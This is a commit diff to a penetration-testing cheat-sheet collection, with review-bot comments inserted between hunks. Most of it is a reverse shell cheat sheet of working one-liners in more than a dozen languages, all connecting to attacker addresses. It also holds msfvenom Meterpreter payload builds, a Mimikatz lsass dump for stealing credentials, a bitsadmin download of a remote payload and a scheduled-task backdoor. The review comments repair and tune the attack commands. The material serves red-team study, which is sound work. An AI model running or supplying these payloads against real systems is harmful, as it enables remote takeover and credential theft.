* [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences) * [Using the SSH "Konami Code" (SSH Control Sequences) - Jeff McJunkin](https://pen-testing.sans.org/blog/2015/11/10/protected-using-the-ssh-konami-code-ssh-control-sequences)
* [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/) * [A Red Teamer's guide to pivoting- Mar 23, 2017 - Artem Kondratenko](https://artkond.com/2017/03/23/pivoting-guide/)
* [Pivoting Meterpreter](https://www.information-security.fr/pivoting-meterpreter/)
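Review bot: while touching this table, the unchanged context line `| remote host 1 | \`ncat -l -p 8080 < file |` is missing its closing backtick, so the cell renders wrongly in every other row's style; add the backtick after `file`.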

View File

@@ -1,6 +1,37 @@
# Reverse Shell Methods # Reverse Shell Cheat Sheet
## Reverse Shell Cheat Sheet ## Summary
* [Reverse Shell](#reverse-shell)
* [Bash TCP](#bash-tcp)
* [Bash UDP](#bash-udp)
* [Socat](#socat)
* [Perl](#perl)
* [Python](#python)
* [PHP](#php)
* [Ruby](#ruby)
* [Golang](#golang)
* [Netcat Traditional](#netcat-traditional)
* [Netcat OpenBsd](#netcat-openbsd)
* [Ncat](#ncat)
* [OpenSSL](#openssl)
* [Powershell](#powershell)
* [Awk](#awk)
* [Java](#java)
* [War](#war)
* [Lua](#lua)
* [NodeJS](#nodejs)
* [Groovy](#groovy)
* [Meterpreter Shell](#meterpreter-shell)
* [Windows Staged reverse TCP](#windows-staged-reverse-tcp)
* [Windows Stageless reverse TCP](#windows-stageless-reverse-tcp)
* [Linux Staged reverse TCP](#linux-staged-reverse-tcp)
* [Linux Stageless reverse TCP](#linux-stageless-reverse-tcp)
* [Other platforms](#other-platforms)
* [Spawn TTY Shell](#spawn-tty-shell)
* [References](#references)
## Reverse Shell
### Bash TCP ### Bash TCP
@@ -20,6 +51,15 @@ Listener:
nc -u -lvp 4242 nc -u -lvp 4242
``` ```
### Socat
```powershell
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4242
```
Static socat binary can be found at [https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat)
### Perl ### Perl
```perl ```perl
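Review bot: the Socat pair needs an ordering note, since the listener must be running before the victim side connects, and a note on what `file:\`tty\`,raw,echo=0` does: it puts the attacker's own terminal in raw mode, so Ctrl-C is forwarded to the remote `bash -li` instead of killing socat, and the way out is `exit` in the remote shell. The link text "https://github.com/andrew-d/static-binaries" also does not match its target, which is the raw `linux/x86_64/socat` binary; say that in the text so readers know they are downloading a binary, not visiting the repository.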
@@ -36,8 +76,19 @@ perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen(
Linux only Linux only
IPv4
```python ```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' export RHOST="10.10.10.10";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
IPv4
```python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```
IPv6
```python
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
``` ```
```python ```python
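Review bot: the new environment-variable one-liner (`export RHOST=...;export RPORT=12345;python -c '...'`) now sits directly under "Linux only" with no sub-heading, while the older line it replaced is moved under "IPv4" and a third variant under "IPv6"; give it its own label (for example "Using environment variables, IPv4") so the three are visibly alternatives. In the IPv6 line, `s.connect(("dead:beef:2::125c",4343,0,2))` deserves a comment: the fourth tuple element is the scope id, i.e. an interface index on the victim, which matters only for link-local `fe80::` addresses and can be left at 0 for a global address like the one shown. Both the IPv4 and IPv6 lines also import `subprocess` without using it.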
@@ -47,7 +98,7 @@ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOC
Windows only Windows only
```powershell ```powershell
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, 
__g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))" C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.10.10.10', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 
's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
``` ```
### PHP ### PHP
@@ -67,16 +118,23 @@ NOTE: Windows only
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
``` ```
### Golang
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
### Netcat Traditional ### Netcat Traditional
```bash ```bash
nc -e /bin/sh [IPADDR] [PORT] nc -e /bin/sh [IPADDR] [PORT]
nc.traditional -e /bin/bash 10.0.0.1 4444
``` ```
### Netcat OpenBsd ### Netcat OpenBsd
```bash ```bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/f
``` ```
### Ncat ### Ncat
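Review bot: the Golang one-liner relies on `go run`, so it only works where a Go toolchain and a writable build cache exist on the target; the section should say so, as it is a much rarer precondition than the interpreters around it. Also, `go run /tmp/t.go && rm /tmp/t.go` removes the source only after `go run` returns, which is when the shell session ends, so `/tmp/t.go` sits on disk for the whole session; if the goal is to clean up, background the `go run` and remove the file afterwards, or drop the `rm` and say the file persists.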
@@ -86,14 +144,25 @@ ncat 127.0.0.1 4444 -e /bin/bash
ncat --udp 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash
``` ```
### OpenSSL
```powershell
hacker@kali$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
hacker@kali$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
or
hacker@kali$ ncat --ssl -vv -l -p 4242
user@company$ mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 127.0.0.1:4242 > /tmp/s; rm /tmp/s
```
### Powershell ### Powershell
```powershell ```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.0.0.1",4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
``` ```
```powershell ```powershell
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.1.3.40',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
``` ```
```powershell ```powershell
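Review bot: `openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes` still prompts interactively for the certificate subject fields (`-nodes` only skips the key passphrase); add `-subj '/CN=localhost'` so the listener setup is scriptable. On the victim line, `openssl s_client -quiet -connect 127.0.0.1:4242` points at loopback while the block uses `hacker@kali` and `user@company` to mean two different hosts; use the attacker address the rest of this file settled on (`10.0.0.1:4242`).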
@@ -103,29 +172,37 @@ powershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubuse
### Awk ### Awk
```powershell ```powershell
awk 'BEGIN {s = "/inet/tcp/0/<IP>/<PORT>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1>/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
``` ```
### Java ### Java
```java ```java
r = Runtime.getRuntime() r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor() p.waitFor()
``` ```
### War
```java
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war > reverse.war
strings reverse.war | grep jsp # in order to get the name of the file
```
### Lua ### Lua
Linux only Linux only
```powershell ```powershell
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');" lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','4242');os.execute('/bin/sh -i <&3 >&3 2>&3');"
``` ```
Windows and Linux Windows and Linux
```powershell ```powershell
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()' lua5.1 -e 'local host, port = "10.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
``` ```
### NodeJS ### NodeJS
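Review bot: the rewritten Awk line contains a stray `>`: `"/inet/tcp/0/10.0.0.1>/4242"` is what is left of the old `<IP>` placeholder, and gawk will try to resolve the host `10.0.0.1>` and fail; it should be `"/inet/tcp/0/10.0.0.1/4242"`. Worth adding that this one-liner needs gawk (the `/inet/` special files and the `|&` coprocess operator are GNU extensions), since on Debian-style systems `awk` is often mawk.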
@@ -136,7 +213,7 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
cp = require("child_process"), cp = require("child_process"),
sh = cp.spawn("/bin/sh", []); sh = cp.spawn("/bin/sh", []);
var client = new net.Socket(); var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){ client.connect(4242, "10.0.0.1", function(){
client.pipe(sh.stdin); client.pipe(sh.stdin);
sh.stdout.pipe(client); sh.stdout.pipe(client);
sh.stderr.pipe(client); sh.stderr.pipe(client);
@@ -147,16 +224,21 @@ lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket")
or or
require('child_process').exec('nc -e /bin/sh [IPADDR] [PORT]') require('child_process').exec('nc -e /bin/sh 10.0.0.1 4242')
or or
-var x = global.process.mainModule.require -var x = global.process.mainModule.require
-x('child_process').exec('nc [IPADDR] [PORT] -e /bin/bash') -x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')
or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
``` ```
### Groovy - by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76) ### Groovy
by [frohoff](https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76)
NOTE: Java reverse shell also work for Groovy NOTE: Java reverse shell also work for Groovy
```javascript ```javascript
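Review bot: the two context lines `-var x = global.process.mainModule.require` and `-x('child_process').exec('nc 10.0.0.1 4242 -e /bin/bash')` carry a leading `-` inside the fenced block on both sides of the diff, so it is content, not a diff marker, and it turns the snippet into a syntax error when pasted; drop the dashes while the IP on the second line is being changed. The bare `https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py` line inside the same fence should move out of the code block as a link.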
@@ -166,15 +248,88 @@ String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close(); Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
``` ```
## Spawn TTY ## Meterpreter Shell
```bash ### Windows Staged reverse TCP
/bin/sh -i
```
(From an interpreter)
```powershell ```powershell
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
```
### Windows Stageless reverse TCP
```powershell
$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f exe > reverse.exe
```
### Linux Staged reverse TCP
```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
```
### Linux Stageless reverse TCP
```powershell
$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.110 LPORT=4242 -f elf >reverse.elf
```
### Other platforms
```powershell
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f elf > shell.elf
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f exe > shell.exe
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f macho > shell.macho
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f asp > shell.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f war > shell.war
$ msfvenom -p cmd/unix/reverse_python LHOST="10.10.10.110" LPORT=4242 -f raw > shell.py
$ msfvenom -p cmd/unix/reverse_bash LHOST="10.10.10.110" LPORT=4242 -f raw > shell.sh
$ msfvenom -p cmd/unix/reverse_perl LHOST="10.10.10.110" LPORT=4242 -f raw > shell.pl
$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.10.10.110" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
```
## Spawn TTY Shell
In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
```powershell
rlwrap nc localhost 80
```
Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.
:warning: OhMyZSH might break this trick, a simple `sh` is recommended
> The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
```powershell
ctrl+z
echo $TERM && tput lines && tput cols
# for bash
stty raw -echo
fg
# for zsh
stty raw -echo; fg
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```
or use `socat` binary to get a fully tty reverse shell
```bash
socat file:`tty`,raw,echo=0 tcp-listen:12345
```
Spawn a TTY shell from an interpreter
```powershell
/bin/sh -i
python -c 'import pty; pty.spawn("/bin/sh")' python -c 'import pty; pty.spawn("/bin/sh")'
perl -e 'exec "/bin/sh";' perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh"; perl: exec "/bin/sh";
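Review bot: in the new "Spawn TTY Shell" section, `rlwrap nc localhost 80` does not listen as the sentence above it says; `nc localhost 80` connects out to a local port 80. Catching the reverse shell needs the listener form, e.g. `rlwrap nc -lvnp 4242`, matching the LPORT used in the msfvenom lines. In the same block, `stty rows <num> columns <cols>` expects the values printed two lines earlier by `tput lines && tput cols`; a comment saying so would save a copy-paste error, and the quoted explanation of why zsh needs `stty raw -echo; fg` on one line has no source link.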
@@ -182,36 +337,9 @@ ruby: exec "/bin/sh"
lua: os.execute('/bin/sh') lua: os.execute('/bin/sh')
``` ```
Access shortcuts, su, nano and autocomplete in a partially tty shell
/!\ OhMyZSH might break this trick, a simple `sh` is recommended
```powershell
# in host
ctrl+z
stty raw -echo
fg
# in reverse shell ## References
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```
(From within vi)
```bash
:!bash
:set shell=/bin/bash:shell
```
(From within nmap)
```sh
!sh
```
## Thanks to
* [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner)
* [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
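Review bot: the older "Access shortcuts, su, nano and autocomplete in a partially tty shell" block (`/!\ OhMyZSH might break this trick` through `stty rows <num> columns <cols>`) is now a duplicate of the "Spawn TTY Shell" section added above, which carries the same ctrl+z / `stty raw -echo` / `fg` / `reset` sequence plus the zsh note; drop this copy so the two do not drift apart. In the vi snippet, `:set shell=/bin/bash:shell` runs two ex commands together; `:set` does not treat `:` as a separator, so it assigns the literal `/bin/bash:shell`. Write `:set shell=/bin/bash` and `:shell` on separate lines.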

View File

@@ -12,6 +12,7 @@
* Aquatone (Ruby and Go versions) * Aquatone (Ruby and Go versions)
* AltDNS * AltDNS
* MassDNS * MassDNS
* Nmap
* Subdomain take over * Subdomain take over
* tko-subs * tko-subs
* HostileSubBruteForcer * HostileSubBruteForcer
@@ -144,6 +145,12 @@ DNS_RESOLVERS="./resolvers.txt"
cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt cat /tmp/results_subfinder.txt | massdns -r $DNS_RESOLVERS -t A -o S -w /tmp/results_subfinder_resolved.txt
``` ```
### Using Nmap
```powershell
nmap -sn --script hostmap-crtsh host_to_scan.tld
```
## Subdomain take over ## Subdomain take over
Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records. Check [Can I take over xyz](https://github.com/EdOverflow/can-i-take-over-xyz) by EdOverflow for a list of services and how to claim (sub)domains with dangling DNS records.
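Review bot: the new "Using Nmap" block fences an nmap command as ```powershell; use ```bash like the massdns block above it. Worth one sentence that `hostmap-crtsh` pulls hostnames from the crt.sh certificate-transparency logs over the Internet, so the scanning host needs outbound access and the result is passive data about the domain rather than anything learned from probing the target.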
@@ -170,7 +177,7 @@ go get github.com/Ice3man543/SubOver
./SubOver -l subdomains.txt ./SubOver -l subdomains.txt
``` ```
## Thanks ## References
* [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/) * [Subdomain Takeover: Proof Creation for Bug Bounties - Patrik Hudak](https://0xpatrik.com/takeover-proofs/)
* [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/) * [Subdomain Takeover: Basics - Patrik Hudak](https://0xpatrik.com/subdomain-takeover-basics/)

View File

@@ -101,6 +101,6 @@ bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>
``` ```
## Thanks to ## References
- [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)

View File

@@ -26,6 +26,25 @@ mimikatz_command -f sekurlsa::logonPasswords full
mimikatz_command -f sekurlsa::wdigest mimikatz_command -f sekurlsa::wdigest
``` ```
## Mimikatz - Mini Dump
Dump the lsass process.
```powershell
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
```
Then load it inside Mimikatz.
```powershell
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
```
## Mimikatz Golden ticket ## Mimikatz Golden ticket
```powershell ```powershell
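Review bot: in the Mini Dump block, `Switch to minidump` is Mimikatz's response to `sekurlsa::minidump lsass.dmp`, not a command, yet it sits on its own line between two `mimikatz #` prompts and will be pasted as one; mark it as output (`# output: Switch to minidump`) or drop it. The two `procdump.exe` lines are alternatives (a local copy versus the Sysinternals live share mapped on `Z:`), so label the second as "or" rather than listing both as steps.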
@@ -85,7 +104,7 @@ More informations can be grabbed from the Memory with :
- [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1) - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
## Thanks to ## References
- [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821) - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
- [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/) - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)

View File

@@ -63,7 +63,7 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D PS C:\> Register-ScheduledTask Backdoor -InputObject $D
``` ```
## Thanks to ## References
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/) * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md) * [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)

View File

@@ -117,7 +117,7 @@ implant/utils/download_file | Downloads a file from the target zombie.
implant/utils/multi_module | Run a number of implants in succession. implant/utils/multi_module | Run a number of implants in succession.
implant/utils/upload_file | Uploads a file from the listening server to the target zombies. implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
## Thanks ## References
- [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/) - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
- [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic) - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)

View File

@@ -1,6 +1,54 @@
# Windows - Privilege Escalation # Windows - Privilege Escalation
Almost all of the following commands are from [The Open Source Windows Privilege Escalation Cheat Sheet](https://addaxsoft.com/wpecs/) ## Summary
* [Tools](#tools)
* [Windows Version and Configuration](#windows-version-and-configuration)
* [User Enumeration](#user-enumeration)
